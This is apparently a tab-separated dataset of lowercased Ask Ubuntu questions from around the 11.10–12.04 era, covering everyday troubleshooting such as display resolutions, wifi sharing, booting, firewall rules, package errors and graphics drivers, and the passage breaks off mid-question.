115980	1600*900 resolution in ubuntu 11.10	i have a sync master lcd screen 20 '' . my graphics card is ՝9300gs nvidia՝ my motherboard is ՝gigabyte g31m՝ i ca n't find 1600*900 resolution in ubuntu 11.10 after fresh installation . what should i do ? thanks in advance . xrandr shows this : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) vga-1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9
115982	get list of recommended packages ( suggestions ) for touch screen support after apt-get install lxde	i was manually installing x server and lxde on my cellphone 's chrooted ubuntu . there were a couple of packages suggested after install related to touchscreen support . i ca n't remember the name of those packages . i checked the apt and dpkg logs and history but it only shows the messages during install not the suggestions after . how can i get again this suggestions without reinstalling ?
115986	i 'm not sure if this is a valid ubuntu bug to file	i was in the process of filing an bug on launchpad , but i had second thoughts because there were so many threatening warnings of the effect , `` do n't file a bug report unless you 're sure it 's a bug , and you should really provide a package name '' . the problem i have , and i 've had it for years , is the following : when i 'm installing ubuntu , it asks me to type in my location before it asks me what my keyboard layout is . using a qwerty keyboard with the buttons popped off and in the dvorak order , this is annoying , because it is assumes i am using a qwerty keyboard , and so i have to guess at where all the qwerty keys are to spell my city 's name . it seems like it would make more sense to switch the order of these two questions . ( i 'll be the first person to admit that this is a very minor problem that has probably wasted less than 2 minutes of my life in total -- but it 's the principle of the thing : p ) so my question is : is this order there for a particular reason , and if it is n't , is it appropriate to file it as a bug , and under which package name ?
115990	wireless internet sharing stops working after client disconnects	i 'm running ubuntu 11.10 with the latest service packs , sharing an ether connection over wireless . everything works fine , up to the point that the client ( a laptop ) sleeps or otherwise disconnects . the wireless connection at that point no longer functions , not showing up when searching for the hotspot with the laptop . the only way to recover is to reboot the machine , or toggle the wireless share off/on . i 've double checked the wireless card has power management off . currently what i 'm doing is keeping an ipod plugged into the box 24/7 to keep the wireless connection up when the laptop disconnects . i 've searched the internet far and wide , found many issues with wireless problems after an ubuntu box itself sleeps , but nothing directly related to my problem . hoping someone has some idea of where to look and what to check . a girl needs her ipod back !
115993	how to add ubuntu to the windows xp boot.ini file ?	i have installed ubuntu 12.04 alpha 2 on a partition separate partition from windows and was wanting to know how to add the os to the boot.ini so i can boot into ubuntu .
115997	how to upgrade flash player on usb-live ubuntu ?	a website requires an upgrade of flash player ( while running firefox ) . my current configuration is : live-usb of 11.10 ubuntu notebook with no internal hdd one external usb hdd internet access can ( and how ) i permanently upgrade flash player on my live-usb ubuntu ?
115999	natural scrolling does n't work in 12.04 in some windows . where should i report the bug ?	natural scrolling using `` .xmodmap '' : pointer = 1 2 3 5 4 7 6 8 9 10 11 12 does n't work anymore in 12.04 on some ubuntu-specific apps like the software center , settings window , and update-center . under what package should i report the bug ?
116002	how to set file associations with playonlinux ?	i have installed ms office 2010 using playonlinux . i want to associate the .docx files to playonlinux . could you please tell me how to do that ? playonlinux does not show up in `` open with '' options . i am using ubuntu 12.04 beta . there is no place that i can find , where i can add a custom command .
116005	gnome 3 ati fan always on	hello i am using ubuntu 11.10 with gnome 3 installed . i have issues with the fan ( i know that there are many threads about this but nothing has worked ) . i am using dell studio xps 1640 running core2duo 2.67gz intel processor and ati radeon hd ( mobility ) 4670 . if you need anymore specs , please let me know . i just installed ubuntu again trying to get everything sorted out . i then imediately updated : sudo apt-get dist-upgrade and then i install gnome 3 sudo apt-get install gnome-shell then i did not install the proprietary drivers provided by ati because i know that they are incredibly unstable with gnome 3 ( plus a ton of errors that i lived with on unity for about 2 months including screen tearing , half the screen does n't draw/update and lots of crashes ) . the ui is smooth and fast with the open source ati drivers ( installed when ubuntu was installed ) . i then tried to reduce the fan by installing jupiter : sudo apt-get install jupiter and cpu freq sudo apt-get install indicator-cpufreq and running sensors : sudo apt-get install lm-sensors sudo sensors-detect i also read that i was suppose to run fancontrol sudo pwmconfig sudo fancontrol however running pwnconfig gives me this output /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed so naturally fancontrol doesnt work . after this , the fan is always on . i set the pc to powersaving mode and still always has the fan on . typing sensors in terminal gives me this output acpitz-virtual-0 adapter : virtual device temp1 : +56.0°c ( crit = +100.0°c ) temp2 : +46.0°c ( crit = +100.0°c ) temp3 : +60.0°c ( crit = +100.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +51.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +51.0°c ( high = +105.0°c , crit = +105.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +61.0°c which my radeon temperature is always around 60 ( even cold boot ) . i go to my windows 7 partition and the fan dies down quickly . i boot back to ubuntu from shutdown and once the login screen comes up , the fan is on and loud ( even if the laptop was cold from external temperatures ) . also there is no option in bios to limit the fan speeds . furthermore , i have also done the steps listed on this webpage : http : //javacolors.blogspot.com/2011/10/ubuntu-1110-ati-radeon-deal.html is there any other methods without installing the ati proprietary drivers to solve this fan solution ?
116006	macbook ca n't boot to linux partitions . forced to use install dvd to boot	i recently installed ubuntu 12.04 lts on my 2008 macbook and removed mac osx completely so that it would just be ubuntu . at first i was having issues with booting . i would have to hold option/alt on startup to select the disk to boot to . i eventually fixed that by `` blessing '' the disk in the mac osx install dvd with bless -device /dev/disk0s2 -setboot -legacy -verbose and it worked . the problem is i had decided to partition my hard drive and install linux mint 12 on the partition . i finished installing but now when i start up the macbook , i ca n't boot from either of the partitions . even if i hold option/alt on startup to select a disk , nothing comes up . i tried blessing one of the disks again but it does n't work now . the only way i am able to boot into either of my operating systems is by inserting the linux mint dvd and selecting `` boot from local drive.. '' is there any way i can fix this ? i have next to no idea what i 'm doing and i would like to be able to boot to one of my operating systems without having to use a dvd.. please help .
116008	how do i re-install ubuntu without losing data ?	i dont know how to reinstall ubuntu , set up my partitions , or save my data ( pictures , videos and documents ) . what should i do first ? my system was set up by someone i no longer speak with .
116014	video lens missing after upgrade to 12.04	i did an upgrade from 11.10 to 12.04 and after this process i saw that the dash was missing my lens for movies and online tv shows . i have the latest version of unity ( 5.8 ) . even after entering unity -- reset i did not get anything . one solution is to do a fresh install of 12.04 , but i have many settings that will take a long time to reset . what can i do ?
116020	python https requests ( urllib2 ) to some sites fail on ubuntu 12.04 without proxy	i have an little app i wrote in python and it used to work ... until yesterday , when it suddenly started giving me an error in a https connection . i do n't remember if there was an update , but both python 2.7.3rc2 and python 3.2 are failing just the same . i googled it and found out that this happens when people are behind a proxy , but i 'm not ( and nothing have changed in my network since the last time it worked ) . my syster 's computer running windows and python 2.7.2 has no problems ( in the same network ) . > > > url = 'https : //www.mediafire.com/api/user/get_session_token.php' > > > response = urllib2.urlopen ( url ) .read ( ) file `` /usr/lib/python2.7/urllib2.py '' , line 126 , in urlopen return _opener.open ( url , data , timeout ) file `` /usr/lib/python2.7/urllib2.py '' , line 400 , in open response = self._open ( req , data ) file `` /usr/lib/python2.7/urllib2.py '' , line 418 , in _open '_open ' , req ) file `` /usr/lib/python2.7/urllib2.py '' , line 378 , in _call_chain result = func ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 1215 , in https_open return self.do_open ( httplib.httpsconnection , req ) file `` /usr/lib/python2.7/urllib2.py '' , line 1177 , in do_open raise urlerror ( err ) urllib2.urlerror : < urlopen error [ errno 8 ] _ssl.c:504 : eof occurred in violation of protocol > what 's wrong ? any help is appreciated . ps . : older python versions do n't work either , not in my system and not in a live session from usb , but do work in a ubuntu 11.10 live session .
116023	iptables mac address filtering not work	i block every port default by ufw and add iptables rules like this : sudo iptables -a input -p tcp -- dport 1723 -m mac -- mac-source 00:11:22:33:44:55 -j accept then i list iptables input rules : sudo iptables -l input -- line-numbers chain input ( policy drop ) num target prot opt source destination 1 accept udp -- anywhere anywhere udp dpt : domain 2 accept tcp -- anywhere anywhere tcp dpt : domain 3 accept udp -- anywhere anywhere udp dpt : bootps 4 accept tcp -- anywhere anywhere tcp dpt : bootps 5 ufw-before-logging-input all -- anywhere anywhere 6 ufw-before-input all -- anywhere anywhere 7 ufw-after-input all -- anywhere anywhere 8 ufw-after-logging-input all -- anywhere anywhere 9 ufw-reject-input all -- anywhere anywhere 10 ufw-track-input all -- anywhere anywhere 11 accept tcp -- anywhere anywhere tcp dpt:1723 mac 00:11:22:33:44:55 but i ca n't visit my server:1723 is there sth wrong ? i use ubuntu 11.10 edit01 : i add followed things : *filter : ufw-before-input - [ 0:0 ] : ufw-before-output - [ 0:0 ] : ufw-before-forward - [ 0:0 ] : ufw-not-local - [ 0:0 ] # end required lines -a ufw-before-input -p tcp -- dport 1723 -m mac -- mac-source 00:11:22:33:44:55 -j accept and then i list the rules sudo iptables -l ufw-before-input -- line-numbers chain ufw-before-input ( 1 references ) num target prot opt source destination 1 accept tcp -- anywhere anywhere tcp dpt:1723 mac 00:11:22:33:44:55 2 accept all -- anywhere anywhere 3 accept all -- anywhere anywhere state related , established 4 ufw-logging-deny all -- anywhere anywhere state invalid 5 drop all -- anywhere anywhere state invalid 6 accept icmp -- anywhere anywhere icmp destination-unreachable 7 accept icmp -- anywhere anywhere icmp source-quench 8 accept icmp -- anywhere anywhere icmp time-exceeded 9 accept icmp -- anywhere anywhere icmp parameter-problem 10 accept icmp -- anywhere anywhere icmp echo-request 11 accept udp -- anywhere anywhere udp spt : bootps dpt : bootpc 12 ufw-not-local all -- anywhere anywhere 13 accept udp -- anywhere 224.0.0.251 udp dpt : mdns 14 accept udp -- anywhere 239.255.255.250 udp dpt:1900 15 ufw-user-input all -- anywhere anywhere and still not work ... of course , after sudo service ufw restart i still connect the server on 1723
116024	windows xp ubuntu installer ( version 11.10 ) error dialog - permission denied	when installing ubuntu 11.10 on windows xp ( 2nd option in installer ) , the install failed with popup . how can i fix this ? here is the contents of file `` c : \documents and settings\keith\local settings\temp\wubi-11.10-rev241.log '' . i only pasted the last few lines because of the question size limit . \temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether c : \docume~1\keith\locals~1\temp\pyl1.tmp is a valid kubuntu cd 03-25 22:29 debug distro : does not contain c : \docume~1\keith\locals~1\temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether c : \docume~1\keith\locals~1\temp\pyl1.tmp is a valid kubuntu cd 03-25 22:29 debug distro : does not contain c : \docume~1\keith\locals~1\temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether c : \docume~1\keith\locals~1\temp\pyl1.tmp is a valid xubuntu cd 03-25 22:29 debug distro : does not contain c : \docume~1\keith\locals~1\temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether c : \docume~1\keith\locals~1\temp\pyl1.tmp is a valid xubuntu cd 03-25 22:29 debug distro : does not contain c : \docume~1\keith\locals~1\temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether c : \docume~1\keith\locals~1\temp\pyl1.tmp is a valid mythbuntu cd 03-25 22:29 debug distro : does not contain c : \docume~1\keith\locals~1\temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether c : \docume~1\keith\locals~1\temp\pyl1.tmp is a valid mythbuntu cd 03-25 22:29 debug distro : does not contain c : \docume~1\keith\locals~1\temp\pyl1.tmp\casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid ubuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid ubuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid kubuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid kubuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid xubuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid xubuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid mythbuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether d : \ is a valid mythbuntu cd 03-25 22:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid ubuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid ubuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid kubuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid kubuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid xubuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid xubuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid mythbuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether e : \ is a valid mythbuntu cd 03-25 22:29 debug distro : does not contain e : \casper\filesystem.squashfs 03-25 22:29 debug distro : checking whether y : \ is a valid ubuntu cd 03-25 22:29 info distro : found a valid cd for ubuntu : y : \ 03-25 22:29 info root : running the installer ... 03-25 22:29 info winuipage : appname=wubi , localedir=c : \docume~1\keith\locals~1\temp\pyl1.tmp\translations , languages= [ 'en_us ' , 'en ' ] 03-25 22:29 info winuipage : appname=wubi , localedir=c : \docume~1\keith\locals~1\temp\pyl1.tmp\translations , languages= [ 'en_us ' , 'en ' ] 03-25 22:29 debug winuiinstallationpage : target_drive=c : , installation_size=18000mb , distro_name=ubuntu , language=en_us , locale=en_us.utf-8 , username=keith 03-25 22:29 info root : received settings 03-25 22:29 info winuipage : appname=wubi , localedir=c : \docume~1\keith\locals~1\temp\pyl1.tmp\translations , languages= [ 'en_us ' , 'en ' ] 03-25 22:29 debug tasklist : # running tasklist ... 03-25 22:29 debug tasklist : # # running select_target_dir ... 03-25 22:29 info windowsbackend : installing into c : \ubuntu 03-25 22:29 debug tasklist : # # finished select_target_dir 03-25 22:29 debug tasklist : # # running create_dir_structure ... 03-25 22:29 debug commonbackend : creating dir c : \ubuntu 03-25 22:29 debug commonbackend : creating dir c : \ubuntu\disks 03-25 22:29 debug commonbackend : creating dir c : \ubuntu\install 03-25 22:29 debug commonbackend : creating dir c : \ubuntu\install\boot 03-25 22:29 debug commonbackend : creating dir c : \ubuntu\disks\boot 03-25 22:29 debug commonbackend : creating dir c : \ubuntu\disks\boot\grub 03-25 22:29 debug commonbackend : creating dir c : \ubuntu\install\boot\grub 03-25 22:29 debug tasklist : # # finished create_dir_structure 03-25 22:29 debug tasklist : # # running uncompress_target_dir ... 03-25 22:29 debug tasklist : # # finished uncompress_target_dir 03-25 22:29 debug tasklist : # # running create_uninstaller ... 03-25 22:29 debug windowsbackend : copying uninstaller y : \wubi.exe - > c : \ubuntu\uninstall-wubi.exe 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi uninstallstring c : \ubuntu\uninstall-wubi.exe 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi installationdir c : \ubuntu 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayname ubuntu 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayicon c : \ubuntu\ubuntu.ico 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayversion 11.10-rev241 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi publisher ubuntu 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi urlinfoabout http : //www.ubuntu.com 03-25 22:29 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi helplink http : //www.ubuntu.com/support 03-25 22:29 debug tasklist : # # finished create_uninstaller 03-25 22:29 debug tasklist : # # running copy_installation_files ... 03-25 22:29 debug windowsbackend : copying c : \docume~1\keith\locals~1\temp\pyl1.tmp\data\custom-installation - > c : \ubuntu\install\custom-installation 03-25 22:29 debug windowsbackend : copying c : \docume~1\keith\locals~1\temp\pyl1.tmp\winboot - > c : \ubuntu\winboot 03-25 22:29 debug windowsbackend : copying c : \docume~1\keith\locals~1\temp\pyl1.tmp\data\images\ubuntu.ico - > c : \ubuntu\ubuntu.ico 03-25 22:29 debug tasklist : # # finished copy_installation_files 03-25 22:29 debug tasklist : # # running get_iso ... 03-25 22:29 debug tasklist : new task copy_file 03-25 22:29 debug tasklist : # # # running copy_file ... 03-25 22:32 error tasklist : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 03-25 22:32 debug tasklist : # cancelling tasklist 03-25 22:32 debug tasklist : new task check_iso 03-25 22:32 error root : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 03-25 22:32 error tasklist : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 03-25 22:32 debug tasklist : # cancelling tasklist 03-25 22:32 debug tasklist : # finished tasklist
116027	how do i make sound automatically mute after returning from hibernation or suspend ?	i want to make my speakers and headphone jack automatically mute when i return from hibernation/suspend , or maybe mute right before i hibernate/suspend . now i could write a script to do that , but i know there are many ways i could go about doing that , however is there a right way to write this script and where would be the right place to put it compared to a basic work around that does not get the the deep system level where this script should reside .
116032	ca n't find files from my windows partition	i recently started using ubuntu for the first time , and i can not find any of the existing files from my hard drive . i 'm running it so i can choose from windows and ubuntu on startup . how do i find all of my files ?
116033	can not type '^ ' ( caret ) in native kde apps	i can not type the caret character '^ ' in native kde apps , such as plasmoids , editors ( kate , kwrite ) , etc . it worked in previous ( older ) versions of kde ( 3.5 , i think ) . i believe it may be related to the fact that i 'm using a keyboard with a german layout , however , it would seem farfetched - i can type the caret character just fine in non-kde apps ( such as chrome , firefox , etc ) . i tried switching keyboard layouts , but no cigar . what 's going on ? what do i have to change to get the caret character back ?
116038	ca n't get my graphics driver ( gma 3150 ) to work	i 've been searching like crazy trying to find a fix for this , it 's the only thing that 's not completely working on my setup . i see posts where people say it should be working but it just is n't . i have a gateway lt2802u netbook and i installed 11.10 on this 2 days ago . everything works except for accelerated graphics . at first i could n't watch a simple flash video at all , but somehow i got it to work . now the last problem i have is i ca n't watch hd videos , my screen resolution wo n't go higher than 1024x600 , and my under my graphics driver it says `` unknown '' . after doing as much research as possible , i 've come to the conclusion that it 's the gma 3150 graphics driver . there is a bunch of talk on it all over the interwebs but nothing lately . i 've tried the fixes that some people have used but most when i try to get the package it 's no longer there or available if that makes sense . i 'm loving everything ubuntu has to offer but it 'll really bite if i ca n't use it any more because of this problem . does anybody have any ideas ? you 'd really be helping a lot .
116040	how to right-align widgets in panel in kubuntu 11.10 ?	first , please take a look at this screenshot : the problem is ... it all happened before i realized what i did . so , i do n't know how i messed it up . : ( do you see the panel at the bottom ? the 'time ' , 'system tray ' , and 'show the desktop ' widgets which are supposed to be aligned right in the panel , are aligned left . selecting `` panel tool box > more settings > panel alignment > right '' changes nothing . also , the application switcher in the panel ( that allows me to switch between various open apps in a workspace - - like in windows ) is missing . there should probably be a way to reset it all . i would like to know that , and ... i would also like to know how i can manually rearrange things back to default , so that i know how it actually works .
116041	help with installing gnome shell google calendar extension	i am having trouble running the script to install the gnome-shell-google-calendar extension into gnome shell . i keep getting this : rafael @ raf : ~ $ ./calendar/gnome-shell-google-calendar.py logging in as 'none ' ... please choose the account : i enter my email here traceback ( most recent call last ) : file `` ./calendar/gnome-shell-google-calendar.py '' , line 455 , in < module > account = oauth.oauth_prompt ( ) file `` /home/rafael/calendar/oauth.py '' , line 25 , in oauth_prompt email = accounts [ int ( raw_input ( 'please choose the account : ' ) ) ] valueerror : invalid literal for int ( ) with base 10 : 'email address' i replaced my actual email address with the words email address for privacy purposes . a bit more info on this extension can be found here : https : //github.com/jnns/gnome-shell-google-calendar http : //maketecheasier.com/integrate-google-calendar-into-gnome-shell/2011/10/04 is there a way of fixing this ?
116044	vga driver for ubuntu-server 11.10	dear all , i am using ubuntu server 11.10 which is running on intel server board s1200bt family g20500-003 , .. but the resolution of the lcd monitor is very low ( 800x600 ) , i want to change the monitor resolution , i really do n't know what to do ? . please help me out , ...
116046	unable to browse internet through tata photon plus after connection is established	i am unable to browse internet through tata photon plus after connection is established ok. ubuntu version is 10.04 lts
116050	update problems due to `` installation of packages from not authenticated sources '' error	i have some problems updating my ubuntu requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . cinnamon gir1.2-muffin-3.0 libgnome-keyring-common libgnome-keyring0 libmuffin0 muffin-common the downloads are from the main server , the source code under ubuntu software tab is marked is there something i have missed ? the output of sudo apt-get update is : w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 6a9653f936fd5529 w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey a777609328949509 w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ oneiric/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-i386_packages )
116051	can i do an install onto a 4gb usb stick which is smaller than the recommended installation size ?	i 've read through this question : how do i install ubuntu to a usb key ? so i am aware how to install ubuntu onto a usb stick . i 'm also aware that the minimum recommended hdd requirement for ubuntu is 5gb . my question is specifically , can i squeeze the install of ubuntu 11.10 onto a 4gb usb stick ? can i do so without downloading alternate version of ubuntu ? because i have only two 4gb usb sticks available . all i want is firefox wi-fi what i have live usb of ubuntu 11.10 notebook without hdd internet access 4gb usb stick the reason why i need full install is to install new programs ( skype ) and do upgrade ( of flash player )
116052	custom keyboard shortcut to lauch a terminal and run a command in unity	i know this should be the simplest thing , but coming up empty . ; - ( i would like to create a keyboard shortcut ctrl-alt-p that opens a terminal window and runs a ping command : ping -c 4 somefixeddomain.com [ useful for quickly checking whether my internet connection is actually working . ] i have attempted to do this ( in unity , ubuntu v11.10 ) using : settings > keyboard > custom shortcuts filling in all the obvious stuff , but no luck . all ideas welcome .
116054	can ubuntu run on any other kernel	is there any kernel on which we can run ubuntu ? ? like in some case debian can run on bsd kernel ( if i am correct ) if it is possible how can i proceed
116060	dead keys not working in java app	the arduino ide is based on a java application called processing . while typing text into processing , it refuses to accept any of the characters under dead keys like `` ' ^ . as a work around i : open another window ( usually my browser or mail client ) ; i type the character i need ; select and copy the character onto my clip board ; copy the character into processing . what do i have to do to make processing accept characters under dead keys ? disabling dead keys is not an option .
116065	how can i access my package update history from the command line ?	in synaptic package manager and ubuntu software centre i can view a history of recent package updates . how can i do the same from the command line ?
116068	if i fill my harddrive , why ca n't i log in ?	i was stupid , i kept ignoring the warnings that my harddrive space was running low and left a download running in the background . when i logged out , i was n't taken back to the login screen ( lightdm ) , and when i rebooted i did n't get the login screen either . instead i got a terminal-like screen that listed drivers/daemons being loaded , but did n't have a prompt . i could still access the terminal with ctrl-alt-f1 ( and f2 etc ) . after barking up many wrong trees i solved it by deleting a file or two . my question is , why did this happen ?
116079	disabling access to weaker wifi signals	i installed a wifi repeater . with it i get a 4 bar signal . without it i get 2 bars . from time to time , my system will switch to the original 2 bar signal . how can i disable access to the original weak signal ? i am on 10.10 ( maverick ) .
116080	thunderbird uses the wrong browser	i 'm unable to make thunderbird open the default browser . in the browser preferences , chromium is selected as the default browser . it 's also selected in `` default applications '' in system settings . in thunderbird , i read `` chrome ( default ) '' which is wrong on all levels : chrome itself complains that it 's not the default browser when i click a link inside thunderbird . in all other places , that i could find , chromium is the default here is what i tried : i used update-alternatives -- config x-www-browser to select chromium-browser as well ( see how do i change the default browser ? ) . and even when i select a different browser from the list in the thunderbird preferences , it still opens chrome . my current solution is to create a link from /usr/bin/google-chrome to chromium-browser . how can i force thunderbird to use the browser i want ? ? ? edit i also updated gnome-www-browser ( update-alternatives -- config gnome-www-browser ) after feedback from roadmr but that did n't help . at least sensible-browser opens chromium , now , but thunderbird is stubborn .
116085	how to open page speed tool in ubuntu	i 've installed pagespeed toolkit in my system . but could n't find the icon to open the pagespeed anywhere in the system i am newbie at ubuntu . please see the below url for the pagespeed instructions http : //code.google.com/speed/page-speed/download.html thanks in advance
116086	what is start_daemon ?	i 'm trying to understand start_daemon in the following /etc/init.d/nagios-nrpe-server startup script : start ) if [ `` $ inetd '' = 1 ] ; then exit 1 fi log_daemon_msg `` starting $ desc '' `` $ name '' start_daemon -p $ piddir/nrpe.pid $ niceness $ daemon -c $ config -d $ daemon_opts log_end_msg $ ? ; ; in particular , when i start this service it is n't writing a pid file as expected , thus the stop service nagios-nrpe-server command is not working ( i need to manually kill the processes ) . i 'm trying to figure out how to trouble shoot the problem , but i ca n't run start_daemon ... from the command line . i want to reproduce what the script is doing manually so i can work on what the problem is .
116089	where can i check for development progress and report bugs for gnome classic panels ?	i 'm testing 12.04 , gnome classic works better than in 11.10 , but there are still some quirks , like for example alt+tab not working . any idea where can i follow the development ?
116096	computer freezes after grub	ok so i 've just built my first computer and have got it running , here are the specs : asus p8z68-v pci-e lx motherboard , intel core i5-2500k , patriot memory 8gb ( 2 x 4gb ) , viper xtreme series pc3-15000 1866mhz cl9 division 2 edition memory ( pxd38g1866elk ) , gigabyte ati radeon 6850 820mhz 1gb pci-e hdmi oc windforce 2x 500w ezcool 24pin psu as standard . the only thing i have n't bought new is the hard drive , it 's a 250gb that i removed from an acer aspire m5100 that i was using till now with no os problems . on start up it runs fine but is unresponsive after the grub menu disappears to load ubuntu ( oneric ocelot ) . the keyboard lights then turn off and the screen eventually returns that there is no signal . is there anything that i could be missing from building ? ( this is my first attempt at building my own pc ) any input would be appreciated , thanks !
116103	server boot black screen , how can i log in ?	after install ubuntu server 11.10 , my server does n't show login screen . at first i can see a purple screen after that my screen go to black and cursor not blink please tell me how i can go to login screen ?
116104	what software is responsible for connecting to the wireless net specified in /etc/network/interfaces ?	i 'm curious what software ( package , utility in bin 's ) handle interface parameters in /etc/network/interfaces and decides to connect to the specified wireless net . i use wifi usb stick dlink dwl-110 attached to wlan0 with ndiswrapper driver . sometimes wlan0 sees my wifi net - iwlist wlan0 scan shows it , but does not connect to it - iwconfig shows ap not-associated , until i replug the stick . neither reinserting module with ndiswrapper , not ifdown/ifup or restarting networking helps . that is why i need to know what os entity handles connection/reconnection to wireless net . edit : shame on me , i use wireless-tool package with wep encryption
116107	how to undo forgetting new packages in aptitude	ca n't remember how many new packages there were before i 've choosen that menu item . does aptitude remember forgotten packages after rerun ?
116109	tool for a `` meta cloud ''	is there a tool in ubuntu which collects the different logins of my cloud hosts ( dropbox , ubuntu one , box.net , hidrive etc ... ) and turns them into a big `` meta cloud virtual hard disk '' ?
116112	how do i perform full text search in man pages ?	i 'm aware about apropos/man -k , but they search in summaries , while i need to search entire man pages . how can i do full text searches in man pages ?
116115	can find any /.ecryptfs dir to retrieve my encrypted home dir	i 've read some questions similar , but not the exactly the same problem ... i 've moved my home directory to a separated partiti贸n ( ubuntu 11.10 ) following this tutorial . after confirming all my files and folders , i 've installed fedora 16 , but forgot that one of those directories was encrypted by ecryptfs . so i was surprised when all i found in my home folder was a file , readme.txt , advising me that my folder was unmounted for security reasons and suggesting that i type on the command line ecryptfs-mount-private ( which did n't work ) , or click on labeled icon `` access your private data '' ( which did n't work either ) . after three days reading all i could find on the internet , i followed dustin kirkland 's tutorial , but it could n't find any .ecryptfs . i 'm sure that the data is somewere ( the size of the moved dir is identical to the original one ) . any help would be greatly appreciated . thanks a lot .
116118	how to dual-monitor in 12.04 with fglrx ?	just installed ubuntu 12.04 and wanted to get my dual monitor setup working . installing fglrx-updates with jockey did n't work so i installed it in the terminal . then i setup up my screens in amdcccle ( multi-desktop ) . that way it worked perfectly in 11.10 . now the only thing i got is a white left screen and on the right screen there is no unity launcher . if my mouse enters the left screen , the cursor changes to an `` x '' . if i activate xinerama in amdcccl both screens work , but i have a top panel on both screens . can i get the 11.10 behavior back ? xorg.conf : section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 1 ] -0 '' 1920 0 screen `` amdcccle-screen [ 1 ] -1 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` serverflags '' option `` xinerama '' `` off '' endsection section `` monitor '' identifier `` 0-dfp6 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` 